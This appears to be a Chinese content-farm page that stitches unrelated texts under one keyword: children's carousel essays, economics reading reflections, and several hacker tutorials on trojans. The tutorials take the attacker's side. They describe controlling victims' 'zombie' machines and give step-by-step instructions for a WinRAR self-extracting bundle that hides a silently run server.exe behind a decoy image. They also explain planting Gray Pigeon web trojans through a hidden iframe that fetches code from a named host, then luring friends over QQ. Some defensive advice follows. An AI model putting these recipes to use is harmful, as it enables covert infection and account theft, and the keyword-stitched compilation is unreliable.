木马原理作文500字

admin管理员组

文章数量:1794759

【导语】今天小编就给大家整理了木马原理作文500字（共12篇），希望对大家的工作和学习有所帮助，欢迎阅读!

篇1：木马原理作文500字

木马原理作文500字

何为木马，就是在公园里孩子们玩的旋转木马，你可能会笑，木马？木马也有原理，别急着笑，听我说。

当你坐在旋转木马上，你会看见前方和后方都会有木马，当木马旋转时，周围的景物在变化，但你前方和后方的木马不会变，就好比赛马场上的你追我赶、真分夺秒；也好比人生，人生不也是如此，充满着竞争，你快了，别人会被你落后，你慢了，别人会超越你。人不仅仅会输在起跑线和终点线上，还有过程，别人从起点开始就占据优势，在最后一刻却输给了你，他虽败犹荣，因为自己已经尽力了。旋转木马互相追逐，却保持着永恒的'距离，人生不也是如此，你被追上就是你输，你追上别人就是你赢，很简单的道理，也是很残酷的道理。在公园里木马或许只是游戏，但在人生的木马上不是游戏而是竞争，竞争什么？分数可以竞争，你99分，我100分就是我赢；名次可以竞争，你第一名我第二名，就是我输；世界上还有许许多多的东西可以竞争，知识的渊博性可以竞争，学习态度可以竞争，学习自觉性可以竞争等等。总而言之，世界是个瞬息万变、充满竞争的地方，只有当你用十二分的热情面对他时，世界才会展现出他的独特之美。

我想没有人会甘当落后，当你不甘落后时，只有你奋发图强，努力拼搏，你总有一天会拥有属于自己的精彩！！

安徽合肥包河区合肥第四十八中学七（5）班初一:朱瑞珂

篇2：认清电脑木马的原理

认清电脑木马的原理

一、基础知识

在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明，因为下面有很多地方会提到这些内容，

一个完整的木马系统由硬件部分、软件部分和具体连接部分组成。

1.硬件部分

建立木马连接所必须的硬件实体。

控制端：对服务端进行远程控制的一方。

服务端：被控制端远程控制的一方。

INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

2.软件部分

实现远程控制所必须的软件程序。

控制端程序：控制端用以远程控制服务端的程序。

木马程序：潜入服务端内部，获取其操作权限的程序。

木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

3.具体连接部分

通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。

控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。

控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

二、特洛伊木马的攻击步骤

用木马这种 工具进行网络入侵，从过程上看大致可分为六步，下面我们就按这六步来详细阐述木马的攻击原理。

1. 配置木马

一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方面功能：

(1)木马伪装：木马配置程序为了在服务端尽可能好的隐藏木马，会采用多种伪装手段，如修改图标、捆绑文件、定制端口、自我销毁等等。

(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址、IRC号、ICQ号等。

2. 传播木马

(1)传播方式

木马的传播方式主要有两种：一种是通过E-MAIL，控制端将木马程序以附件的形式夹在邮件中发送出去，收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为名义，将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。

(2)伪装方式

鉴于木马的危害性，很多人对木马知识还是有一定了解的，这对木马的传播起了一定的抑制作用，这是木马设计者所不愿见到的。因此他们开发了多种功能来伪装木马，以达到降低用户警觉，欺骗用户的目的。一般来说有以下几种：

◆修改图标:也许你会在E-MAIL的附件中看到一个很平常的文本图标，但是我不得不告诉你，这也有可能是个木马程序，现在已经有木马可以将木马服务端程序的图标改成HTML、TXT、ZIP等各种文件的图标，这有相当大的迷惑性，但是目前提供这种功能的木马还不多见，并且这种伪装也不是无懈可击的，所以不必整天提心吊胆、疑神疑鬼的。

◆捆绑文件:这种伪装手段是将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷的进入了系统。至于被捆绑的文件一般是可执行文件，即EXE、COM一类的文件。

◆出错显示:有一定木马知识的人都知道，如果打开一个文件，没有任何反应，这很可能就是个木马程序，木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。当服务端用户打开木马程序时，会弹出一个错误提示框——这当然是假的，错误内容可自由定义，大多会定制成一些诸如“文件已破坏，无法打开的!”之类的信息，当服务端用户信以为真时，木马却悄悄侵入了系统，

◆定制端口:很多老式的木马端口都是固定的，这给判断是否感染了木马带来了方便，只要查一下特定的端口就知道感染了什么木马，所以现在很多新式的木马都加入了定制端口的功能，控制端用户可以在1024——65535之间任选一个端口作为木马端口。一般不选1024以下的端口，这样就给判断所感染木马类型带来了麻烦。

◆自我销毁:这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马会将自己拷贝到WINDOWS的系统文件的C:WINDOWS或C:WINDOWSSYSTEM目录下，一般来说原木马文件和系统文件夹中的木马文件的大小是一样的，捆绑文件的木马除外。那么中了木马的朋友只要在近来收到的信件和下载的软件中找到原木马文件，然后根据原木马的大小去系统文件夹找相同大小的文件， 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工具帮助下，就很难删除木马了。

◆木马更名:安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章，按图索骥在系统文件夹查找特定的文件，就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。

3.运行木马

服务端用户运行木马或捆绑木马的程序后，木马就会自动进行安装。首先将自身拷贝到WINDOWS的系统文件夹中C:WINDOWS或C:WINDOWSSYSTEM目录下。然后在注册表、启动组、非启动组中设置好木马的触发条件，这样木马的安装就完成了。安装后就可以启动木马了。

由触发条件激活木马

触发条件是指启动木马的条件，大致出现在下面八个地方：

◆注册表:打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run和RunServices主键，在其中寻找可能是启动木马的键值。

◆WIN.INI:C:WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在windows字段中有启动命令load=和run=，在一般情况下是空白的，如果有启动程序，可能是木马。

◆SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini，用文本方式打开，在386Enh、mic、drivers32中有命令行，在其中寻找木马的启动命令。

◆Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行。

◆*.INI:即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。

◆注册表:打开HKEY_CLASSES_ROOT文件类型shellopencommand主键，查看其键值。举个例子，国产木马“冰河”就是修改HKEY_CLASSES_ROOTtxtfileshellopencommand下的键值，将“C:WINDOWS NOTEPAD.EXE %1”改为“C:WINDOWSSYSTEMSYSEXPLR.EXE %1”，这时你双击一个TXT文件后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明的是不光是TXT文件，通过修改HTML、EXE、ZIP等文件的启动命令的键值都可以启动木马，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile，ZIP是WINZIP，大家可以试着去找一下。

◆捆绑文件:实现这种触发条件首先要控制端和服务端通过木 立连接，然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。

◆启动菜单:在“开始—程序—启动”选项下也可能有木马的触发条件。

篇3： 必懂的木马连接原理

目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马 正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口，

必懂的木马连接原理

。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口 由于到现在，宽带上网(动态IP)和路由器的普遍，这个软

目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马 正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口 由于到现在，宽带上网(动态IP)和路由器的普遍，这个软件就有很大的不足 动态IP：每次拨号，IP都会跟换.所以，就算对方中了木马，在下次拨号的时候，我们会因为找不到IP而丢肉鸡 路由器：就是多个电脑同用1条宽带(网吧上网就是最好的例子)他们通过路由器连接到宽带，例如：主机的IP为225.124.3.41，而内网(就是用路由器的机器)的IP为192.168.X.X。在内网环境下，我们外界是无法访问的，就是机器中了木马也没用。下面大家看下我的示意图。简单来说，内网的机器是比较安全的，外界是无法访问的，就是我们连接不了内网器，而连接内网的机器，除非在同区域网里(在网吧A机，就能用RIDMIN连接网吧的B机). 简单总结：在不同区域网下，正向木马只能连接到外网的机器，而不能连接到内网的机器 由于一系列的不足，就产生了反弹连接木马，例如出门的国产软件：灰鸽子 反弹连接木马，就是在我们机器上开启一个端口，让中马者来连接我们，从而获得肉鸡的信息，就算对方的IP怎么改变，也是无际于事。如果我们自己机器上的IP改变了，肉鸡就无法找到我们的机器，从而无法获得肉鸡的信息，不过这点是不成问题的，WWW兴起，就有了域名。在网络中通过的对域名的访问能找到自己对应的IP地址，例如www.baidu的IP地址为22.181.38.4 如果百度的IP变成12.11.22.3的话，只要域名不改变，就算IP地址怎么变，它也能找到你。就算是内网的机器，我们也能获得他的信息。 总结到底：本地开启1个端口，肉鸡连接上我们，就算是内外网的机器也可以 反弹连接木马最头疼的地方就是使用者是内网状态的(大家可以看我的路线图，蓝色为反弹连接，黑色为正常连接)。说到为什么最头疼，大家就回忆下正向连接木马的原理。别人是无法直接访问路由器内的机器(内网)。

篇4：菜鸟必懂木马连接原理

136243“>

来源:安全中国

目前常见的木马有三种 正向连接木马 反弹连接木马 收信木马

正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口，而我们要知道他的IP，才能够连接他。123就是他机器上开的端口

由于到现在，宽带上网(动态IP)和路由器的普遍，这个软件就有很大的不足

动态IP：每次拨号，IP都会跟换.所以，就算对方中了木马，在下次拨号的时候，我们会因为找不到IP而丢肉鸡

路由器：就是多个电脑同用1条宽带(网吧上网就是最好的例子)他们通过路由器连接到宽带，例如：主机的IP为225.124.3.41，而内网(就是用路由器的机器)的IP为192.168.X.X。在内网环境下，我们外界是无法访问的，就是机器中了木马也没用。下面大家看下我的示意图。简单来说，内网的机器是比较安全的，外界是无法访问的，就是我们连接不了内网器。而连接内网的机器，除非在同区域网里(在网吧A机，就能用RIDMIN连接网吧的B机).

简单总结：在不同区域网下，正向木马只能连接到外网的机器，而不能连接到内网的机器

由于一系列的不足，就产生了反弹连接木马，例如出门的国产软件：灰鸽子

反弹连接木马，就是在我们机器上开启一个端口，让中马者来连接我们，从而获得肉鸡的信息，就算对方的IP怎么改变，也是无际于事，

如果我们自己机器上的IP改变了，肉鸡就无法找到我们的机器，从而无法获得肉鸡的信息，不过这点是不成问题的，WWW兴起，就有了域名。在网络中通过的对域名的访问能找到自己对应的IP地址，例如www.baidu的IP地址为22.181.38.4 如果百度的IP变成12.11.22.3的话，只要域名不改变，就算IP地址怎么变，它也能找到你。就算是内网的机器，我们也能获得他的信息。

总结到底：本地开启1个端口，肉鸡连接上我们，就算是内外网的机器也可以

反弹连接木马最头疼的地方就是使用者是内网状态的(大家可以看我的路线图，蓝色为反弹连接，黑色为正常连接)。说到为什么最头疼，大家就回忆下正向连接木马的原理。别人是无法直接访问路由器内的机器(内网)。

篇5：用WinRAR解密木马捆绑的原理

今天朋友突然想我求救，说网络游戏传奇世界的号被盗了，由于朋友是在家上网，排除了在公共场所帐号和密码被别他人瞟视的可能，据朋友所说，在被盗的前一个多小时，在网上下载了一个网友的照片，并打开浏览了，但是出现的确实是网友的照片，并且是用“Windows 图片和传真查看器”（朋友家是XP系统）打开的，这也可以肯定一定是图片文件。朋友还告诉笔者后缀名是.gif，很显然是图片文件，朋友的电脑也没有安装杀毒软件，并且最重要的是那个文件还没有删。

笔者便让朋友把那个文件通过QQ发了过来，发送的时候笔者在QQ显示文件名中发现了那个文件并不是gif文件，而是exe文件，文件名是：我的照片.gif.exe，并且它的图标也是图片文件的图标，见图1。笔者认为朋友的电脑应该打开了“隐藏已知文件类型的扩展名”（大家可以在“我的电脑”菜单中“工具→文件夹选项→查看→高级设置”中设置，见图2，所以告诉我后缀名是gif。笔者无意中右点了下这个文件，发现可以用“WinRAR打开”，于是笔者就用WinRAR打开了，发现里面含有两个文件――我的照片.gif和server.exe，可以肯定这server.exe就是木马，也就是朋友盗传奇世界号的罪魁祸首。

由于可以直接用WinRAR打开，笔者断定它就是由WinRAR制作的，现在笔者就开始解密它的制作过程。首先要有图片文件的ico（图标）文件（可以使用其他软件提取，笔者就不在这里讲述详细过程了），如图3。把图片文件和木马都选定，右点，选择“添加到档案文件”（WinRAR的选项），见图4，在“档案文件名”那输入压缩后的文件名，比如：我的照片.gif.exe，后缀如果为.exe就可以直接执行，如果不是.rar就会打开WinRAR，所以这里最后的后缀为.exe，根据自己的需要选择“压缩方式”，然后点击“高级”标签，选择“SFX 选项”，见图5，在“释放路径”中填入你需要解压的路径，笔者这里填的是“%systemroot%temp”（不包括引号），表示解压缩到系统安装目录下的temp（临时文件）文件夹下，并且在“安装程序”的“释放后运行”输入“server.exe”（不包括引号），在“释放前运行”输入“我的照片.gif”（不包括引号），

这样在解压缩前将会打开我的照片.gif这个文件，造成朋友对文件判断的假象，会认为它就是一个图片文件，而释放完以后便会自动运行木马（即server.exe）。在“模式”标签的“缄默模式”中选择“全部隐藏”，“覆盖方式”中选择“覆盖所有文件”，在“文字和图标”标签的“自定义SFX图标”，载入刚才所准备的图片文件的ico文件，然后点击“确定”即可，这样即天衣无缝的制作了一个捆绑图片的木马。当打开这个文件时，会先运行图片文件，再自动打开木马文件，中间不会出现任何提示。

注：希望广大朋友不要进行非法用途，在这里解密木马捆绑是希望大家了解其原理。

点击阅读更多学院相关文章>>

分享到

篇6：“灰鸽子”网页木马从原理、制作到防范

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马，这是我一 朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理

首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是 精心制作的，用户一旦访问了该网页就会中木马。为什么说是 精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载 放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序

小提示：代码说明

a.代码中“src”的属性为程序的网络地址，本例中“go163go.vicp/1.exe

b.也可以把木马程序上传到免费的主页空间上去，但免费空间出于安全的考虑，多数不允许上传exe文件， 可能变通一下把扩展名exe改为bat或com，这样他们就可以把这些程序上传到服务器上了。

把这段代码插入到网页源代码的…之间（如图1），然后用没打补丁的IE6打开，接下来，打开IE的临时目录，你会发现，在该文件夹中有一个“1.exe”文件，这也就是说，该网页已自动下载了我放置在Web服务器上的灰鸽子木马。

图1网页木马示例

小提示：灰鸽子木马

为什么一定要用灰鸽子木马呢？因为灰鸽子是反弹型木马，该木马能绕过天网等大多数防火墙的拦截，中马后，服务端即被控端能主动连接控制端（客户端），也就是说，一旦被控端连接到Internet，在控制端那里，被控端就会“自动上线”（如图2）。

图2灰鸽子控制短示例（汗！又一大毒枭:)）

⒉自动运行程序

把这段代码插入到网页源代码的…之间，然后用IE打开该网页，你会发现，这段代码可以在没有打相关补丁的IE6中自动打开记事本。

这段代码使用了shell.application控件，该控件能使网页获得执行权限，替换代码中的“Notepad.exe”（记事本）程序，可以用它自动运行本地电脑上的任意程序。

通过以上的代码我们可以看出，利用IE的漏洞，也就是说在网页中插入适当的代码，IE完全可以自动下载和运行程序，不过，IE一旦打了相关补丁，这些代码就会失去作用。另外，这些代码要运行和下载程序，有些杀毒软件的网页监控会视它们为病毒，为了逃避追杀， 可能会使用一些工具对网页的源代码进行加密处理（如图3）。

图3加密后的网页代码

二、网页木马的基本用法

理解了网页木马攻击的原理，我们可以制作自己的网页木马，但这需要你根据IE漏洞写出利用代码。实际上，在网上有很多高手已写出了一些漏洞的利用代码，有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索，你会发现，在网上有很多利用IE的各种漏洞编写的网页木马生成器，它们大都为可视化的程序，只要你有一个木马（该木马必须把它放置到网络上），利用这些生成器你就可以立即生成一个网页，该网页就是网页木马，只要他人打开这个网页，该网页就可以自动完成下载木马并运行（安装）木马的过程。

在我的电脑上我已下载了一个网页木马生成器，下面我们来看怎么生成网页木马并让他人中木马。

第一步：启动该网页木马生成器，如图4所示，在文本框中输入木马的网络地址，最后单击“生成”。

图4网页木马生成器

第二步：在网页木马生成器的安装文件夹会生成一个网页文件，该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。

现在好了，把上述网页在服务器上的地址（网址）通过QQ发给自己的好友，一旦他访问了该网页，该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。

现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧！实际上，即使人人都不打开陌生人发来的网址，也仍然有一些人“飞蛾补灯，自寻死路”，因为若大的Internet，总会有一些人会有意或无意地访问这些网址，而且，有些网页木马，还挂在一些知名网站上（根据知名网站的访问量，你算算吧，每天有多少人中了木马！）。

小提示：你可能还没想到，看电影，在论坛查看或回复帖子也能中木马。实际上，网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上，这样，用户一旦观看电影、查看或预览邮件（主要是一些用电子邮件群发器发送的垃圾邮件）、参与帖子，打开电子书，用户就会中网页木马。

在下面我们只介绍 如何在知名网站上挂网页木马。下面来看这一段代码：iframesrc=”img.shangxueba/jyimg/xncsw130424/width=“0”

小提示：“src”的属性“go163go.vicp/hk.htm

把这段代码插入到某门户网站首页源代码的…之间，从表面上看，插入后该门户的首页并没有什么变化，但是，所有访问了该门户网站首页的人都会中木马，为什么会这样呢？这是因为这段代码中标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中，

也叫浮动帧标签，它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果（如图5），被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。在上代代码中，因为把宽（width）、高（height）、边框（frameborder）都设置为了“0”，所以，上述代码插入到门户网站的首页后，网站的首页不会发生变化，但是，由于嵌入的网页实际上已经打开了，所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。

图5iframe标签示例

也许有人会问，如何把上述代码插入到门户网站首页的源代码中？这个问题问得好，本人才疏学浅，确实无法进入他们的服务器修改网页，但是 如果发现了这些服务器上的漏洞且获得了webshell权限，那么修改他们的网页就跟在本地制作一个网页一样容易。

有人还问，拿到服务器的webshell权限容易吗？如果你对网络安全比较关注，你会发现，经常有这个网站被黑了，那个网站的主页被修改了的新闻爆出。

有人还问，门户的服务器几乎无漏洞可找，个人服务器的漏洞较多，你能进入吗？本人不是 ，中华人民共和国的法律规定，入侵和篡改他人服务器上的信息是违法行为，希望大家共同维护网络安全。

以前，在网上打开一些有名的网站时杀毒软件也会报警，现在你明白其中的道理了吧。有些人在这些网站发帖子骂娘，看了本文，希望在骂娘时你也能为那些垫背的站长想想。

三：网页木马的防范策略

网页木马的防范只靠杀毒软件和防火墙是远远不够的，因为一旦 使用了反弹端口的个人版木马（个人反汇编的一些杀毒软件无法识别的木马），那么杀毒软件和防火墙就无可奈何，所以，网页木马的防范要从它的原理入手，从根子上进行防范。

㈠即时安装安全补丁

网页木马都是利用IE漏洞进行传播的，我们拿冰狐浪子的网页木马（用“冰狐浪子网页木马生成器”制作的网页木马）来说吧，该网页能绕过IE的安全设置，当用户连接到该网页时，它能在普通用户不知情的情况下在后台下载一个木马并运行（安装）该木马。所以，经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。

㈡改名或卸载（反注册）最不安全的ActiveXObject（IE插件）

在系统中有些ActiveXObject会运行EXE程序，比如本文中“自动运行程序”代码中的Shell.application控件，这些控件一旦在网页中获得了执行权限，那么它就会变为木马运行的“温床”，所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。但是ActiveXObject是为了应用而出现的，而不是为了攻击而出现的，所有的控件都有它的用处，所以在改名或卸载一个控件之前，你必须确认这个控件是你不需要的，或者即使卸载了也不关大体的。

⒈卸载（反注册）ActiveXObject

第一步：在“开始”菜单上单击“运行”，输入“CMD”命令打开命令提示符窗口。

第二步：在命令提示符下输入“regsvr32.exeshell32.dll/u/s”，然后回车就能将Shell.application控件卸载。

如果日后我们希望继续使用这个控件的话，可以在命令提示符窗口中输入“regsvr32.exeshell32.dll/i/s”命令将它们重新安装（注册）。在上述命令中：“regsvr32.exe”是注册或反注册OLE对象或控件的命令，[/u]是反注册参数，[/s]是寂静模式参数，[/I]为安装参数。

⒉改名ActiveXObject

需要说明的是，改名一个控件时，控件的名称和CLSID（ClassID）都要改，并且要改彻底了。下面仍以Shell.application为例来介绍方法。

第一步：打开注册表编辑器，查找“Shell.application”。用这个方法能找到两个注册表项：“{13709620-C279-11CE-A49E-444553540000}”和“Shell.application”。

第二步：把{13709620-C279-11CE-A49E-444553540000}改为{13709620-C279-11CE-A49E-444553540001}，注意，不要和系统中的其它CLSID重复。

第三步：把“Shell.application”改名为“Shell.application_xxx”。以后用到这个控件的时候你使用这个名称就可以正常调用此控件了。

㈢提高IE的安全级别，禁用脚本和ActiveX控件

经笔者的测试，用冰狐浪子的“网页木马专业版生成器”生成的网页木马，只要调高IE的安全级别，或者禁用脚本，该网页木马就不起作用了。从木马的攻击原理我们可以看出，网页木马是利用IE脚本和ActiveX控件上的一些漏洞下载和运行木马的，只要我们禁用了脚本和ActiveX控件，就可以防止木马的下载和运行。

小提示：禁用脚本和ActiveX控件会使一些网页的功能和效果失去作用，所以是否禁用，你要根据自己对安全的需要来定。

第一步：在IE浏览器的菜单栏上选择“工具→Internet选项”打开“Internet选项”对话框。

第二步：在“安全”选项卡上，在Internet和本地Internet区域，分别把滑块移动到最高（如图6），或者点击“自定义级别”，在打开的对话框上禁用脚本，禁用ActiveX控件。

篇7：玩游戏的作文500字:旋转木马

上午在解放杯学完英语，吃完中午饭，爸爸、弟弟、妹妹、舅舅、舅妈和我就决定去日月光广场玩。

因为下午上课，所以我们就在楼下跑了好久，竟然只换到了一个“旋转木马”，我一看，不!这个太幼稚了吧!我才不想玩呢!可是，不玩这个玩什么呢?哎，就玩这个吧。开始的时候我才真正体会那上面是有多么多么多么的幼稚啊!我一坐上去就发现我的右边就出现了白雪公主、熊大、熊二~~~可是弟弟妹妹坐在上面真的是高兴惨了!徐二娃!你看!这里还有小火车和狮子，还有老虎~~~

第一次坐完了想不到还要坐第二次!哈哈，第二次我就坐在马上一声不吭，就在那里呆着，可是爸爸他们却在那儿咔嚓咔嚓地拍照。因为刚吃完饭，爸爸在那里拿了几颗糖，弟弟妹妹就一直找爸爸要糖吃。

五分钟完了之后舅妈说老板说的坐两次还免费送一次，继续坐!我坐在上面都快睡着了，我当时觉得时间过得好慢啊。五分钟过去了我想：“哎——终于可以去上课了。”

下次再也不坐这么幼稚的东西了!

老师的话：哈哈哈!原来人长大就是一瞬间的事情。三年前的义森肯定很喜欢旋转木马吧?恩，仔细想想，女生可能会一直喜欢，所以舅妈也没有觉得烦哦!只是你是怎么得到这个旋转木马的免费票的呢?也可以跟大家讲讲，不然我就看得云里雾里呢!

作者|徐义森

公众号：冯栎钧是老师

篇8：经济学原理读后感500字

《经济学原理》的微观经济学分册中，向读者先阐述了经济学的十大原理，紧接着就向我们介绍如何像经济学家一样思考，仿佛是赋予读者一个经济学家或者说研究者的身份，更深地去体会这本书的奥义。

然后曼昆从不同对象看待经济学的不同角度来深入阐述，这个角色怎么做，为什么这么做。同时，大量的举例也让我更好地去理解。书的左右侧还特意留出了一块对一些名词作专门的解释，好像划重点一样，读起来也是很方便，且回头再复习、检索也更容易。供需理论、弹性分析、剩余福利......这些概念中，我们可以得到一些有意思的经济学分析结论，如由于粮价的低弹性，科技进步带来的农业发展往往却牺牲了农民的收益;又如，无论商品税收是向消费者还是向生产者征收，其最终版本的转嫁结果都是一样的等等。当然，不同的人读这本书肯定有不同的见解，我在网上也不乏看到一些反驳曼昆观点的论据。那么我对于《经济学原理》这本书读过之后，印象里最深刻的一点就是经济学可以让我学会做决策。我引用书里对一篇新闻的摘录中一句话：“我想象不出对于公司CEO、国会议员或美国总统来说，什么专业比经济学更好。”说学好数理化是走遍天下都不怕，是因为你会有很多对于生活细节上的知识以及更强的逻辑能力，被扔到一个荒岛上理科学的好得或许可以比文科学的好的多活好久等等。但经济学是一种系统的、经过严格训练的思维方式，只要不出现被扔到荒岛上的这种特殊情况，我觉得经济学更能使我终生受益。

篇9：经济学原理读后感500字

经济学这个词源于希腊语，意为“管理一个家的人”

在一个家庭面临许多决策时，它必需决定哪些家庭成员去做什么，以及回报每个家庭成员得到什么，谁做饭?谁洗衣服?而谁能在晚餐时多得一个甜筒?简而言之，家庭必须考虑每个成员的能力，努力和愿望，在各个成员中配置稀缺资源。

同样，一个社会也面临许多厥词，社会必须要一个人种粮，做衣……一旦社会分配人们去做各种工作，也该分配他们生产的物品与劳动量。

由于资源稀缺，社会管理就显得尤为重要，稀缺性(scarcity)是指社会拥有的资源是有限的。一个社会也不能给每个人他们向往的最高水平生活。

经济学(economics)研究社会如何管理字节的稀缺资源。多数中，资源是由成千上万家庭和企业共同行为来配置的。

因此，经济学家研究人们如何去做出决策，他们工作多少，购买什么，储蓄多少，以及如何将这些储蓄用于投资。经济学家还研究人们互相交易。例如，经济学家探讨一种物众多的买着与卖者如何共同决定这种物品的销售价格与销售量。最后经济学家的工作就是分析影响整个经济的力量和趋势，包括平均收入的增长，找不到工作的人占总人口的比例以及价格上升的速度。

而以上这只是经济学所研究的一种方面。

个人做出决策的四个原理:

1.1.1原理一:人们面临权衡取舍

为了得到我们喜爱的一样东西，通常不得不放弃另一件我们喜爱的东西。做出决策要我们在一个目标和另一个目标之间取舍。

社会棉铃的另一种权衡取舍是在效率和平等之间的。

效率(efficiency)是指实惠能从其稀缺资源中得到最多的东西。平等(equity)是指将这些资源的成功公平的分配给社会成员，换句话说，效率指经济蛋糕的大小，而平等是指如何分配这块蛋糕。在设计政府政策时，这两个目标往往是不一致的。比如现在我们共同富裕这个目的在于实现更平等的分配经济福利政策。某些此类证词如福利制度或失业保障，是要帮助那些最需要帮助的社会成员。而现在我国GDP数据如此好看就是块大蛋糕，而社会在于权衡取舍的天枰上就倾向于了效率，而稍稍忽视了平等。

另一方面，另一政策，如个人所得税，是要求经济上成功人士对政府给予比其他人更多的支持。虽然这些证词对于实现更大的平等有好处，但它一降低效率为代价。当政府把富人的收入再分配给需要的人时候，就减少了他们对于辛勤工作的奖励;结果，人们的工作少了，生产的物品与劳务也少了。

换句话说，当政府要把经济蛋糕切得更均等的小块时，这块蛋糕的本身也就变小了。

或许，我单纯的认为，我们的社会将这两种政策换个位置，相同的权衡取舍，也许能取到更好的效果?去另一个角度增加蛋糕的大小，而我们不应该由于帮助了穷人扭曲了工作激励而忽视那些成功的人。

所以说，认识到生活中的取舍是重要的，因为人们只有在了解了他们所面临的选择才能做出良好的决策。

篇10：经济学原理读后感500字

《经济学原理》读后感读完这本书，果然收获不小。很多以前不是太明白的一些现象，现在都有了一些新的理解:大到国家的经济，比如，中美之间的贸易对谁有利，对谁有弊;英国当年为啥要搞圈地运动;小到个人经济，比如我的工资是如何被制定的等等。以后我会慢慢把这些想法都整理记录下来。这本经济学原理的开篇就提出了经济学的十大原理，其后的章节都是围绕着这十大原理对各种社会经济现象进行的分析论述。在这里，我就以重新复习一遍这十个原理的方式来作为自己的读后感吧。这十大原理中的头两条不单适用于经济学领域，而是对我们所做的任何决定都适用，所以我在这里对这两条做了评论。其它条目领会得还不够深，要过些时候单独写评论。

1.people face tradeoffs.人们面临权衡取舍。这一条作为十大原理之首，是因为每个人即便从未学过经济也会对它有最深刻的体会。经济学中所有的问题归根结底都是由这个权衡取舍引出来的;而经济学研究的意义也正是在于帮助人们在权衡取舍中选择最优的方案。我想大家应该都有过和我同样的体会:欲望很多，能得到满足的却很少。鱼和熊掌不可得兼，舍鱼而取熊掌，这是一个最熟为人知的权衡取舍。而我自己也是每天面对各种权衡取舍:早饭吃包子还是油条;多花点时间工作还是多花点时间锻炼身体;平时多学计算机还多学习经济;是买房还是投资;是愁眉苦脸地计划将来的每一步路，还是干脆啥也不想又傻又开心的过日子。

